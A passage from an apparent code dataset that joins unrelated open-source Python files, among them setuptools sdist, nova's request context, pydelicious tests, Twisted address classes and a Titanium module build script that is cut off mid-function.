help=optparse.SUPPRESS_HELP),
optparse.make_option(
'--proxy',
dest='proxy',
type='str',
default='',
help="Specify a proxy in the form [user:passwd@]proxy.server:port."),
optparse.make_option(
'--timeout', '--default-timeout',
metavar='sec',
dest='timeout',
type='float',
default=15,
help='Set the socket timeout (default %default seconds).'),
optparse.make_option(
# The default version control system for editables, e.g. 'svn'
'--default-vcs',
dest='default_vcs',
type='str',
default='',
help=optparse.SUPPRESS_HELP),
optparse.make_option(
# A regex to be used to skip requirements
'--skip-requirements-regex',
dest='skip_requirements_regex',
type='str',
default='',
help=optparse.SUPPRESS_HELP),
optparse.make_option(
# Option when path already exist
'--exists-action',
dest='exists_action',
type='choice',
choices=['s', 'i', 'w', 'b'],
default=[],
action='append',
metavar='action',
help="Default action when a path already exists: "
"(s)witch, (i)gnore, (w)ipe, (b)ackup."),
optparse.make_option(
'--cert',
dest='cert',
type='str',
default='',
metavar='path',
help = "Path to alternate CA bundle."),
]
| gpl-2.0 |
kingvuplus/italysat-enigma4 | tools/create_picon_links.py | 192 | 1273 | #
# create links for picon
# usage: create_picon_links lamedb
# run in picon directory.
# It will read the servicenames from the lamedb and create symlinks
# for the servicereference names.
import os, sys
f = open(sys.argv[1]).readlines()
f = f[f.index("services\n")+1:-3]
while len(f):
ref = [int(x, 0x10) for x in f[0][:-1].split(':')]
name = f[1][:-1]
name = name.replace('\xc2\x87', '').replace('\xc2\x86', '')
# SID:NS:TSID:ONID:STYPE:UNUSED(channelnumber in enigma1)
# X X X X D D
# REFTYPE:FLAGS:STYPE:SID:TSID:ONID:NS:PARENT_SID:PARENT_TSID:UNUSED
# D D X X X X X X X X
refstr = "1:0:%X:%X:%X:%X:%X:0:0:0" % (ref[4], ref[0], ref[2], ref[3], ref[1])
refstr = refstr.replace(':', '_')
filename = name + ".png"
linkname = refstr + ".png"
filename = filename.replace('/', '_').replace('\\', '_').replace('&', '_').replace('\'', '').replace('"', '').replace('`', '')
filename = filename.replace('\n', '')
for i in range(len(filename)):
if ord(filename[i]) > 127:
filename = filename[0:i] + '_' + filename[i + 1:]
if os.access(filename, os.F_OK) and not os.access(linkname, os.F_OK):
os.symlink(filename, linkname)
else:
print "could not find %s (%s)" % (filename, name)
f =f[3:]
| gpl-2.0 |
manojpandey/hackenvision16 | tinybank/tinybank/venv/lib/python2.7/site-packages/setuptools/command/sdist.py | 111 | 7050 | from glob import glob
from distutils import log
import distutils.command.sdist as orig
import os
import sys
import io
from setuptools.extern import six
from setuptools.utils import cs_path_exists
import pkg_resources
READMES = 'README', 'README.rst', 'README.txt'
_default_revctrl = list
def walk_revctrl(dirname=''):
"""Find all files under revision control"""
for ep in pkg_resources.iter_entry_points('setuptools.file_finders'):
for item in ep.load()(dirname):
yield item
class sdist(orig.sdist):
"""Smart sdist that finds anything supported by revision control"""
user_options = [
('formats=', None,
"formats for source distribution (comma-separated list)"),
('keep-temp', 'k',
"keep the distribution tree around after creating " +
"archive file(s)"),
('dist-dir=', 'd',
"directory to put the source distribution archive(s) in "
"[default: dist]"),
]
negative_opt = {}
def run(self):
self.run_command('egg_info')
ei_cmd = self.get_finalized_command('egg_info')
self.filelist = ei_cmd.filelist
self.filelist.append(os.path.join(ei_cmd.egg_info, 'SOURCES.txt'))
self.check_readme()
# Run sub commands
for cmd_name in self.get_sub_commands():
self.run_command(cmd_name)
# Call check_metadata only if no 'check' command
# (distutils <= 2.6)
import distutils.command
if 'check' not in distutils.command.__all__:
self.check_metadata()
self.make_distribution()
dist_files = getattr(self.distribution, 'dist_files', [])
for file in self.archive_files:
data = ('sdist', '', file)
if data not in dist_files:
dist_files.append(data)
def __read_template_hack(self):
# This grody hack closes the template file (MANIFEST.in) if an
# exception occurs during read_template.
# Doing so prevents an error when easy_install attempts to delete the
# file.
try:
orig.sdist.read_template(self)
except:
_, _, tb = sys.exc_info()
tb.tb_next.tb_frame.f_locals['template'].close()
raise
# Beginning with Python 2.7.2, 3.1.4, and 3.2.1, this leaky file handle
# has been fixed, so only override the method if we're using an earlier
# Python.
has_leaky_handle = (
sys.version_info < (2, 7, 2)
or (3, 0) <= sys.version_info < (3, 1, 4)
or (3, 2) <= sys.version_info < (3, 2, 1)
)
if has_leaky_handle:
read_template = __read_template_hack
def add_defaults(self):
standards = [READMES,
self.distribution.script_name]
for fn in standards:
if isinstance(fn, tuple):
alts = fn
got_it = 0
for fn in alts:
if cs_path_exists(fn):
got_it = 1
self.filelist.append(fn)
break
if not got_it:
self.warn("standard file not found: should have one of " +
', '.join(alts))
else:
if cs_path_exists(fn):
self.filelist.append(fn)
else:
self.warn("standard file '%s' not found" % fn)
optional = ['test/test*.py', 'setup.cfg']
for pattern in optional:
files = list(filter(cs_path_exists, glob(pattern)))
if files:
self.filelist.extend(files)
# getting python files
if self.distribution.has_pure_modules():
build_py = self.get_finalized_command('build_py')
self.filelist.extend(build_py.get_source_files())
# This functionality is incompatible with include_package_data, and
# will in fact create an infinite recursion if include_package_data
# is True. Use of include_package_data will imply that
# distutils-style automatic handling of package_data is disabled
if not self.distribution.include_package_data:
for _, src_dir, _, filenames in build_py.data_files:
self.filelist.extend([os.path.join(src_dir, filename)
for filename in filenames])
if self.distribution.has_ext_modules():
build_ext = self.get_finalized_command('build_ext')
self.filelist.extend(build_ext.get_source_files())
if self.distribution.has_c_libraries():
build_clib = self.get_finalized_command('build_clib')
self.filelist.extend(build_clib.get_source_files())
if self.distribution.has_scripts():
build_scripts = self.get_finalized_command('build_scripts')
self.filelist.extend(build_scripts.get_source_files())
def check_readme(self):
for f in READMES:
if os.path.exists(f):
return
else:
self.warn(
"standard file not found: should have one of " +
', '.join(READMES)
)
def make_release_tree(self, base_dir, files):
orig.sdist.make_release_tree(self, base_dir, files)
# Save any egg_info command line options used to create this sdist
dest = os.path.join(base_dir, 'setup.cfg')
if hasattr(os, 'link') and os.path.exists(dest):
# unlink and re-copy, since it might be hard-linked, and
# we don't want to change the source version
os.unlink(dest)
self.copy_file('setup.cfg', dest)
self.get_finalized_command('egg_info').save_version_info(dest)
def _manifest_is_not_generated(self):
# check for special comment used in 2.7.1 and higher
if not os.path.isfile(self.manifest):
return False
with io.open(self.manifest, 'rb') as fp:
first_line = fp.readline()
return (first_line !=
'# file GENERATED by distutils, do NOT edit\n'.encode())
def read_manifest(self):
"""Read the manifest file (named by 'self.manifest') and use it to
fill in 'self.filelist', the list of files to include in the source
distribution.
"""
log.info("reading manifest file '%s'", self.manifest)
manifest = open(self.manifest, 'rbU')
for line in manifest:
# The manifest must contain UTF-8. See #303.
if six.PY3:
try:
line = line.decode('UTF-8')
except UnicodeDecodeError:
log.warn("%r not UTF-8 decodable -- skipping" % line)
continue
# ignore comments and blank lines
line = line.strip()
if line.startswith('#') or not line:
continue
self.filelist.append(line)
manifest.close()
| mit |
rhinstaller/anaconda | pyanaconda/modules/payloads/kickstart.py | 3 | 2940 | #
# Kickstart handler for packaging.
#
# Copyright (C) 2018 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
from pykickstart.errors import KickstartParseError
from pykickstart.parser import Packages, Group
from pykickstart.sections import PackageSection
from pykickstart.constants import KS_BROKEN_IGNORE, GROUP_DEFAULT
from pyanaconda.core.configuration.anaconda import conf
from pyanaconda.core.i18n import _
from pyanaconda.core.kickstart import KickstartSpecification, commands as COMMANDS
class AnacondaPackageSection(PackageSection):
"""The parser of the %packages kickstart section."""
def handleHeader(self, lineno, args):
"""Process packages section header.
Add checks based on configuration settings.
"""
super().handleHeader(lineno, args)
if not conf.payload.enable_ignore_broken_packages \
and self.handler.packages.handleBroken == KS_BROKEN_IGNORE:
raise KickstartParseError(
_("The %packages --ignorebroken feature is not supported on your product!"),
lineno=lineno
)
class AnacondaPackages(Packages):
"""The representation of the %packages kickstart section."""
def create_group(self, name, include=GROUP_DEFAULT):
"""Create a new instance of a group.
:param name: a name of the group
:param include: a level of inclusion
:return: a group object
"""
return Group(name=name, include=include)
class PayloadKickstartSpecification(KickstartSpecification):
commands = {
"cdrom": COMMANDS.Cdrom,
"harddrive": COMMANDS.HardDrive,
"hmc": COMMANDS.Hmc,
"liveimg": COMMANDS.Liveimg,
"module": COMMANDS.Module,
"nfs": COMMANDS.NFS,
"ostreesetup": COMMANDS.OSTreeSetup,
"url": COMMANDS.Url
}
commands_data = {
"ModuleData": COMMANDS.ModuleData
}
sections = {
"packages": AnacondaPackageSection
}
sections_data = {
"packages": AnacondaPackages
}
| gpl-2.0 |
petrutlucian94/nova_dev | nova/context.py | 3 | 8078 | # Copyright 2011 OpenStack Foundation
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""RequestContext: context for requests that persist through all of nova."""
import copy
import uuid
import six
from nova import exception
from nova.openstack.common.gettextutils import _
from nova.openstack.common import local
from nova.openstack.common import log as logging
from nova.openstack.common import timeutils
from nova import policy
LOG = logging.getLogger(__name__)
def generate_request_id():
return 'req-' + str(uuid.uuid4())
class RequestContext(object):
"""Security context and request information.
Represents the user taking a given action within the system.
"""
def __init__(self, user_id, project_id, is_admin=None, read_deleted="no",
roles=None, remote_address=None, timestamp=None,
request_id=None, auth_token=None, overwrite=True,
quota_class=None, user_name=None, project_name=None,
service_catalog=None, instance_lock_checked=False, **kwargs):
"""
:param read_deleted: 'no' indicates deleted records are hidden, 'yes'
indicates deleted records are visible, 'only' indicates that
*only* deleted records are visible.
:param overwrite: Set to False to ensure that the greenthread local
copy of the index is not overwritten.
:param kwargs: Extra arguments that might be present, but we ignore
because they possibly came in from older rpc messages.
"""
if kwargs:
LOG.warn(_('Arguments dropped when creating context: %s') %
str(kwargs))
self.user_id = user_id
self.project_id = project_id
self.roles = roles or []
self.read_deleted = read_deleted
self.remote_address = remote_address
if not timestamp:
timestamp = timeutils.utcnow()
if isinstance(timestamp, six.string_types):
timestamp = timeutils.parse_strtime(timestamp)
self.timestamp = timestamp
if not request_id:
request_id = generate_request_id()
self.request_id = request_id
self.auth_token = auth_token
if service_catalog:
# Only include required parts of service_catalog
self.service_catalog = [s for s in service_catalog
if s.get('type') in ('volume',)]
else:
# if list is empty or none
self.service_catalog = []
self.instance_lock_checked = instance_lock_checked
# NOTE(markmc): this attribute is currently only used by the
# rs_limits turnstile pre-processor.
# See https://lists.launchpad.net/openstack/msg12200.html
self.quota_class = quota_class
self.user_name = user_name
self.project_name = project_name
self.is_admin = is_admin
if self.is_admin is None:
self.is_admin = policy.check_is_admin(self)
if overwrite or not hasattr(local.store, 'context'):
self.update_store()
def _get_read_deleted(self):
return self._read_deleted
def _set_read_deleted(self, read_deleted):
if read_deleted not in ('no', 'yes', 'only'):
raise ValueError(_("read_deleted can only be one of 'no', "
"'yes' or 'only', not %r") % read_deleted)
self._read_deleted = read_deleted
def _del_read_deleted(self):
del self._read_deleted
read_deleted = property(_get_read_deleted, _set_read_deleted,
_del_read_deleted)
def update_store(self):
local.store.context = self
def to_dict(self):
return {'user_id': self.user_id,
'project_id': self.project_id,
'is_admin': self.is_admin,
'read_deleted': self.read_deleted,
'roles': self.roles,
'remote_address': self.remote_address,
'timestamp': timeutils.strtime(self.timestamp),
'request_id': self.request_id,
'auth_token': self.auth_token,
'quota_class': self.quota_class,
'user_name': self.user_name,
'service_catalog': self.service_catalog,
'project_name': self.project_name,
'instance_lock_checked': self.instance_lock_checked,
'tenant': self.tenant,
'user': self.user}
@classmethod
def from_dict(cls, values):
values.pop('user', None)
values.pop('tenant', None)
return cls(**values)
def elevated(self, read_deleted=None, overwrite=False):
"""Return a version of this context with admin flag set."""
context = copy.copy(self)
context.is_admin = True
if 'admin' not in context.roles:
context.roles.append('admin')
if read_deleted is not None:
context.read_deleted = read_deleted
return context
# NOTE(sirp): the openstack/common version of RequestContext uses
# tenant/user whereas the Nova version uses project_id/user_id. We need
# this shim in order to use context-aware code from openstack/common, like
# logging, until we make the switch to using openstack/common's version of
# RequestContext.
@property
def tenant(self):
return self.project_id
@property
def user(self):
return self.user_id
def get_admin_context(read_deleted="no"):
return RequestContext(user_id=None,
project_id=None,
is_admin=True,
read_deleted=read_deleted,
overwrite=False)
def is_user_context(context):
"""Indicates if the request context is a normal user."""
if not context:
return False
if context.is_admin:
return False
if not context.user_id or not context.project_id:
return False
return True
def require_admin_context(ctxt):
"""Raise exception.AdminRequired() if context is an admin context."""
if not ctxt.is_admin:
raise exception.AdminRequired()
def require_context(ctxt):
"""Raise exception.NotAuthorized() if context is not a user or an
admin context.
"""
if not ctxt.is_admin and not is_user_context(ctxt):
raise exception.NotAuthorized()
def authorize_project_context(context, project_id):
"""Ensures a request has permission to access the given project."""
if is_user_context(context):
if not context.project_id:
raise exception.NotAuthorized()
elif context.project_id != project_id:
raise exception.NotAuthorized()
def authorize_user_context(context, user_id):
"""Ensures a request has permission to access the given user."""
if is_user_context(context):
if not context.user_id:
raise exception.NotAuthorized()
elif context.user_id != user_id:
raise exception.NotAuthorized()
def authorize_quota_class_context(context, class_name):
"""Ensures a request has permission to access the given quota class."""
if is_user_context(context):
if not context.quota_class:
raise exception.NotAuthorized()
elif context.quota_class != class_name:
raise exception.NotAuthorized()
| apache-2.0 |
dastjead/pydelicious | tests/pydelicioustest.py | 23 | 9251 | """Unittests for pydelicious module.
"""
import sys, os
import unittest
import urllib
import urllib2
import pydelicious
import time
from StringIO import StringIO
test_data = {
# old rss feeds
'http://del.icio.us/rss/': 'var/rss.xml',
'http://del.icio.us/rss/popular/': 'var/rss_popular.xml',
'http://del.icio.us/rss/tag/python': 'var/rss_tag_python.xml',
'http://del.icio.us/rss/pydelicious': 'var/rss_pydelicious.xml',
'http://del.icio.us/rss/url/efbfb246d886393d48065551434dab54': 'var/rss_url.xml',
# v2 feeds
'http://feeds.delicious.com/v2/json': 'var/feed_v2.json',
'http://feeds.delicious.com/v2/rss': 'var/feed_v2.rss',
'http://feeds.delicious.com/v2/json/recent': 'var/feed_v2_recent.json',
'http://feeds.delicious.com/v2/rss/recent': 'var/feed_v2_recent.rss.xml',
}
def fetch_file(url, fn):
data = urllib2.urlopen(url).read()
if os.path.exists(fn):
acted = 'Overwritten'
else:
acted = 'New'
open(fn, 'w+').write(data)
print "%s file %s for <%s>" % (acted, fn, url)
def http_request_dummy(url, user_agent=None, retry=0, opener=None):
if url in test_data:
fn = test_data[url]
if not os.path.isfile(fn):
fetch_file(url, fn)
return open(fn)
else:
return StringIO(url)
# Turn of all HTTP fetching in pydelicious,
# don't do http requests but return pre-def data
# See blackbox tests if you want to test for real
pydelicious.http_request = http_request_dummy
def api_request_dummy(path, params='', user='', passwd='', opener=None):
"""Instead of mimicking the server responses this will return a tuple
including the url.
"""
if params:
url = "%s/%s?%s" % (pydelicious.DLCS_API, path, urllib.urlencode(params))
else:
url = "%s/%s" % (pydelicious.DLCS_API, path)
return url, user, passwd
def parser_dummy(data, split_tags=False):
return {'not-parsed':data}
class PyDeliciousTester(unittest.TestCase):
def assertContains(self, container, object):
self.failUnless(object in container, "%s not in %s" %(object, container))
class TestWaiter(PyDeliciousTester):
def testwait1(self):
wt = pydelicious.DLCS_WAIT_TIME
# First call, no wait needed
t = time.time()
pydelicious.Waiter()
waited = round(time.time() - t, 1)
self.assert_(waited < wt,
"unneeded wait of %s" % (waited,))
# Some values between full wait intervals
for w in .4, .7, 1.5:
time.sleep(w)
t = time.time()
pydelicious.Waiter()
waited = round(time.time() - t, 1)
self.assert_(waited <= pydelicious.DLCS_WAIT_TIME,
"unneeded wait of %s (not %s)" % (w,
pydelicious.DLCS_WAIT_TIME-w))
# Some more regular intervals
t = time.time()
for i in range(0, 2):
pydelicious.Waiter()
waited = time.time() - t
self.assert_(waited >= i*wt,
"needed wait of %s, not %s" % (i*wt, waited,))
class TestGetrss(PyDeliciousTester):
"test old RSS feed parsing"
# def test_dlcs_rss_request(self):
# f = pydelicious.dlcs_rss_request
# pass
def test_getrss(self):
self.assert_(pydelicious.feedparser, "feedparser required for this test")
p = pydelicious.getrss
self.assertEqual(
type(p()), type([]) )
self.assertEqual(
type(p(popular=1)), type([]) )
self.assert_(
type(p(tag="python")), type([]) )
self.assert_(
type(p(user="pydelicious")), type([]) )
self.assertEqual(
type(p(url="http://deliciouspython.python-hosting.com/")),
type([]) )
class TestFeeds(PyDeliciousTester):
"""
TODO: implement json/rss parsing
"""
def test_getfeed(self):
f = pydelicious.getfeed
data = f('')
self.assertEqual( data[:2]+data[-2:], '[{}]' )
if pydelicious.feedparser:
pass # TODO
else:
self.assert_( f('', format='rss').startswith('<?xml version="1.0" encoding="UTF-8"?>') )
# print f('', format='json')
# print f('recent')
# print f('recent', format='rss')
class TestBug(PyDeliciousTester):
def testBug2(self):
'''testbug2: via deepak.jois@gmail.com
missing "" in {"user":user}'''
self.assert_(pydelicious.feedparser, "feedparser required for this test")
self.assertEqual(
type(pydelicious.getrss(tag="read",user="deepakjois")),
type([]))
class DeliciousApiUnitTest(PyDeliciousTester):
"""Simply tests wether DeliciousAPI.request(`path`, `args`) results in the same URL as
DeliciousAPI.`path`(`args`)
"""
def setUp(self):
self.api_utf8 = pydelicious.DeliciousAPI('testUser', 'testPwd',
'utf-8', api_request=api_request_dummy, xml_parser=parser_dummy)
self.api_latin1 = pydelicious.DeliciousAPI('testUser', 'testPwd',
'latin-1', api_request=api_request_dummy, xml_parser=parser_dummy)
def test_param_encoding(self):
a = self.api_utf8
params = {
'foo': '\xe2\x98\x85',
'bar': '\xc3\xa4'
}
params = a._encode_params(params, a.codec)
self.assert_('foo=%E2%98%85' in urllib.urlencode(params))
self.assert_('bar=%C3%A4' in urllib.urlencode(params))
a = self.api_latin1
params = {
'bar': '\xe4',
'baz': '\xa4'
}
params = a._encode_params(params, a.codec)
self.assert_('bar=%C3%A4' in urllib.urlencode(params))
self.assert_('baz=%C2%A4' in urllib.urlencode(params))
def test_fetch_vs_methods(self):
a = self.api_utf8
self.assertEqual(a.request('tags/get'), a.tags_get())
self.assertEqual(a.request('tags/rename', old='tag1', new='tag2'), a.tags_rename('tag1', 'tag2'))
self.assertEqual(a.request('posts/update'), a.posts_update())
self.assertEqual(a.request('posts/dates'), a.posts_dates())
self.assertEqual(a.request('posts/get', meta='yes'), a.posts_get())
self.assertEqual(a.request('posts/get', meta=True), a.posts_get())
self.assertEqual(a.request('posts/recent'), a.posts_recent())
self.assertEqual(a.request('posts/all', meta=True), a.posts_all())
self.assertEqual(a.request('posts/add', url='url1', description='descr1', replace='no', shared='no'), a.posts_add('url1', 'descr1', replace='no', shared='no'))
self.assertEqual(a.request('posts/delete', url='url1'), a.posts_delete('url1'))
self.assertEqual(a.request('tags/bundles/all'), a.bundles_all())
self.assertEqual(a.request('tags/bundles/set', bundle='bundle1', tags='tag1 tag2'), a.bundles_set('bundle1', 'tag1 tag2'))
self.assertEqual(a.request('tags/bundles/delete', bundle='bundle1'), a.bundles_delete('bundle1'))
def test_fetch_raw_vs_methods(self):
a = self.api_utf8
self.assertEqual(a.request_raw('tags/get'), a.tags_get(_raw=True))
self.assertEqual(a.request_raw('tags/rename', old='tag1', new='tag2'), a.tags_rename('tag1', 'tag2', _raw=True))
self.assertEqual(a.request_raw('posts/update'), a.posts_update(_raw=True))
self.assertEqual(a.request_raw('posts/dates'), a.posts_dates(_raw=True))
self.assertEqual(a.request_raw('posts/get', meta=True), a.posts_get(_raw=True))
self.assertEqual(a.request_raw('posts/get', meta='yes'), a.posts_get(_raw=True))
self.assertEqual(a.request_raw('posts/recent'), a.posts_recent(_raw=True))
self.assertEqual(a.request_raw('posts/all', meta=True), a.posts_all(_raw=True))
self.assertEqual(a.request_raw('posts/add', url='url1', description='descr1', replace='no', shared='no'), a.posts_add('url1', 'descr1', replace='no', shared='no', _raw=True))
self.assertEqual(a.request_raw('posts/delete', url='url1'), a.posts_delete('url1', _raw=True))
self.assertEqual(a.request_raw('tags/bundles/all'), a.bundles_all(_raw=True))
self.assertEqual(a.request_raw('tags/bundles/set', bundle='bundle1', tags='tag1 tag2'), a.bundles_set('bundle1', 'tag1 tag2', _raw=True))
self.assertEqual(a.request_raw('tags/bundles/delete', bundle='bundle1'), a.bundles_delete('bundle1', _raw=True))
class DeliciousErrorTest(PyDeliciousTester):
def test_raiseFor(self):
self.assertRaises(
pydelicious.DeliciousItemExistsError,
pydelicious.DeliciousError.raiseFor, 'item already exists',
'path/add', **{'url':'urn:system'});
self.assertRaises(
pydelicious.DeliciousError,
pydelicious.DeliciousError.raiseFor, 'other error', 'path/get'
);
__testcases__ = (TestGetrss, TestBug, TestFeeds, DeliciousApiUnitTest, DeliciousErrorTest)#TestWaiter, )
if __name__ == '__main__':
if len(sys.argv)>1 and sys.argv[1] == 'refresh_test_data':
for url, fn in test_data.items():
if os.path.exists(fn):
fetch_file(url, fn)
else:
unittest.main()
| bsd-2-clause |
mitchcapper/mythbox | resources/lib/twisted/twisted/internet/address.py | 56 | 4196 | # Copyright (c) 2001-2010 Twisted Matrix Laboratories.
# See LICENSE for details.
"""Address objects for network connections."""
import warnings, os
from zope.interface import implements
from twisted.internet.interfaces import IAddress
class IPv4Address(object):
"""
Object representing an IPv4 socket endpoint.
@ivar type: A string describing the type of transport, either 'TCP' or 'UDP'.
@ivar host: A string containing the dotted-quad IP address.
@ivar port: An integer representing the port number.
"""
# _bwHack is given to old users who think we are a tuple. They expected
# addr[0] to define the socket type rather than the address family, so
# the value comes from a different namespace than the new .type value:
# type = map[_bwHack]
# map = { 'SSL': 'TCP', 'INET': 'TCP', 'INET_UDP': 'UDP' }
implements(IAddress)
def __init__(self, type, host, port, _bwHack = None):
assert type in ('TCP', 'UDP')
self.type = type
self.host = host
self.port = port
self._bwHack = _bwHack
def __getitem__(self, index):
warnings.warn("IPv4Address.__getitem__ is deprecated. Use attributes instead.",
category=DeprecationWarning, stacklevel=2)
return (self._bwHack or self.type, self.host, self.port).__getitem__(index)
def __getslice__(self, start, stop):
warnings.warn("IPv4Address.__getitem__ is deprecated. Use attributes instead.",
category=DeprecationWarning, stacklevel=2)
return (self._bwHack or self.type, self.host, self.port)[start:stop]
def __eq__(self, other):
if isinstance(other, tuple):
return tuple(self) == other
elif isinstance(other, IPv4Address):
a = (self.type, self.host, self.port)
b = (other.type, other.host, other.port)
return a == b
return False
def __repr__(self):
return 'IPv4Address(%s, %r, %d)' % (self.type, self.host, self.port)
class UNIXAddress(object):
"""
Object representing a UNIX socket endpoint.
@ivar name: The filename associated with this socket.
@type name: C{str}
"""
implements(IAddress)
def __init__(self, name, _bwHack='UNIX'):
self.name = name
self._bwHack = _bwHack
def __getitem__(self, index):
warnings.warn("UNIXAddress.__getitem__ is deprecated. Use attributes instead.",
category=DeprecationWarning, stacklevel=2)
return (self._bwHack, self.name).__getitem__(index)
def __getslice__(self, start, stop):
warnings.warn("UNIXAddress.__getitem__ is deprecated. Use attributes instead.",
category=DeprecationWarning, stacklevel=2)
return (self._bwHack, self.name)[start:stop]
def __eq__(self, other):
if isinstance(other, tuple):
return tuple(self) == other
elif isinstance(other, UNIXAddress):
# First do the simple thing and check to see if the names are the
# same. If not, and the paths exist, check to see if they point to
# the same file.
if self.name == other.name:
return True
else:
try:
return os.path.samefile(self.name, other.name)
except OSError:
pass
return False
def __repr__(self):
return 'UNIXAddress(%r)' % (self.name,)
# These are for buildFactory backwards compatability due to
# stupidity-induced inconsistency.
class _ServerFactoryIPv4Address(IPv4Address):
"""Backwards compatability hack. Just like IPv4Address in practice."""
def __eq__(self, other):
if isinstance(other, tuple):
warnings.warn("IPv4Address.__getitem__ is deprecated. Use attributes instead.",
category=DeprecationWarning, stacklevel=2)
return (self.host, self.port) == other
elif isinstance(other, IPv4Address):
a = (self.type, self.host, self.port)
b = (other.type, other.host, other.port)
return a == b
return False
| gpl-2.0 |
Lukic/Lukic.Weather | build.py | 1 | 6796 | #!/usr/bin/env python
#
# Appcelerator Titanium Module Packager
#
#
import os, subprocess, sys, glob, string
import zipfile
from datetime import date
cwd = os.path.abspath(os.path.dirname(sys._getframe(0).f_code.co_filename))
os.chdir(cwd)
required_module_keys = ['name','version','moduleid','description','copyright','license','copyright','platform','minsdk']
module_defaults = {
'description':'My module',
'author': 'Your Name',
'license' : 'Specify your license',
'copyright' : 'Copyright (c) %s by Your Company' % str(date.today().year),
}
module_license_default = "TODO: place your license here and we'll include it in the module distribution"
def find_sdk(config):
sdk = config['TITANIUM_SDK']
return os.path.expandvars(os.path.expanduser(sdk))
def replace_vars(config,token):
idx = token.find('$(')
while idx != -1:
idx2 = token.find(')',idx+2)
if idx2 == -1: break
key = token[idx+2:idx2]
if not config.has_key(key): break
token = token.replace('$(%s)' % key, config[key])
idx = token.find('$(')
return token
def read_ti_xcconfig():
contents = open(os.path.join(cwd,'titanium.xcconfig')).read()
config = {}
for line in contents.splitlines(False):
line = line.strip()
if line[0:2]=='//': continue
idx = line.find('=')
if idx > 0:
key = line[0:idx].strip()
value = line[idx+1:].strip()
config[key] = replace_vars(config,value)
return config
def generate_doc(config):
docdir = os.path.join(cwd,'documentation')
if not os.path.exists(docdir):
print "Couldn't find documentation file at: %s" % docdir
return None
try:
import markdown2 as markdown
except ImportError:
import markdown
documentation = []
for file in os.listdir(docdir):
if file in ignoreFiles or os.path.isdir(os.path.join(docdir, file)):
continue
md = open(os.path.join(docdir,file)).read()
html = markdown.markdown(md)
documentation.append({file:html});
return documentation
def compile_js(manifest,config):
js_file = os.path.join(cwd,'assets','nu.lukic.weather.js')
if not os.path.exists(js_file): return
from compiler import Compiler
try:
import json
except:
import simplejson as json
compiler = Compiler(cwd, manifest['moduleid'], manifest['name'], 'commonjs')
root_asset, module_assets = compiler.compile_module()
root_asset_content = """
%s
return filterDataInRange([NSData dataWithBytesNoCopy:data length:sizeof(data) freeWhenDone:NO], ranges[0]);
""" % root_asset
module_asset_content = """
%s
NSNumber *index = [map objectForKey:path];
if (index == nil) {
return nil;
}
return filterDataInRange([NSData dataWithBytesNoCopy:data length:sizeof(data) freeWhenDone:NO], ranges[index.integerValue]);
""" % module_assets
from tools import splice_code
assets_router = os.path.join(cwd,'Classes','NuLukicWeatherModuleAssets.m')
splice_code(assets_router, 'asset', root_asset_content)
splice_code(assets_router, 'resolve_asset', module_asset_content)
# Generate the exports after crawling all of the available JS source
exports = open('metadata.json','w')
json.dump({'exports':compiler.exports }, exports)
exports.close()
def die(msg):
print msg
sys.exit(1)
def warn(msg):
print "[WARN] %s" % msg
def validate_license():
c = open(os.path.join(cwd,'LICENSE')).read()
if c.find(module_license_default)!=-1:
warn('please update the LICENSE file with your license text before distributing')
def validate_manifest():
path = os.path.join(cwd,'manifest')
f = open(path)
if not os.path.exists(path): die("missing %s" % path)
manifest = {}
for line in f.readlines():
line = line.strip()
if line[0:1]=='#': continue
if line.find(':') < 0: continue
key,value = line.split(':')
manifest[key.strip()]=value.strip()
for key in required_module_keys:
if not manifest.has_key(key): die("missing required manifest key '%s'" % key)
if module_defaults.has_key(key):
defvalue = module_defaults[key]
curvalue = manifest[key]
if curvalue==defvalue: warn("please update the manifest key: '%s' to a non-default value" % key)
return manifest,path
ignoreFiles = ['.DS_Store','.gitignore','libTitanium.a','titanium.jar','README']
ignoreDirs = ['.DS_Store','.svn','.git','CVSROOT']
def zip_dir(zf,dir,basepath,ignoreExt=[]):
if not os.path.exists(dir): return
for root, dirs, files in os.walk(dir):
for name in ignoreDirs:
if name in dirs:
dirs.remove(name) # don't visit ignored directories
for file in files:
if file in ignoreFiles: continue
e = os.path.splitext(file)
if len(e) == 2 and e[1] in ignoreExt: continue
from_ = os.path.join(root, file)
to_ = from_.replace(dir, '%s/%s'%(basepath,dir), 1)
zf.write(from_, to_)
def glob_libfiles():
files = []
for libfile in glob.glob('build/**/*.a'):
if libfile.find('Release-')!=-1:
files.append(libfile)
return files
def build_module(manifest,config):
from tools import ensure_dev_path
ensure_dev_path()
rc = os.system("xcodebuild -sdk iphoneos -configuration Release")
if rc != 0:
die("xcodebuild failed")
rc = os.system("xcodebuild -sdk iphonesimulator -configuration Release")
if rc != 0:
die("xcodebuild failed")
# build the merged library using lipo
moduleid = manifest['moduleid']
libpaths = ''
for libfile in glob_libfiles():
libpaths+='%s ' % libfile
os.system("lipo %s -create -output build/lib%s.a" %(libpaths,moduleid))
def package_module(manifest,mf,config):
name = manifest['name'].lower()
moduleid = manifest['moduleid'].lower()
version = manifest['version']
modulezip = '%s-iphone-%s.zip' % (moduleid,version)
if os.path.exists(modulezip): os.remove(modulezip)
zf = zipfile.ZipFile(modulezip, 'w', zipfile.ZIP_DEFLATED)
modulepath = 'modules/iphone/%s/%s' % (moduleid,version)
zf.write(mf,'%s/manifest' % modulepath)
libname = 'lib%s.a' % moduleid
zf.write('build/%s' % libname, '%s/%s' % (modulepath,libname))
docs = generate_doc(config)
if docs!=None:
for doc in docs:
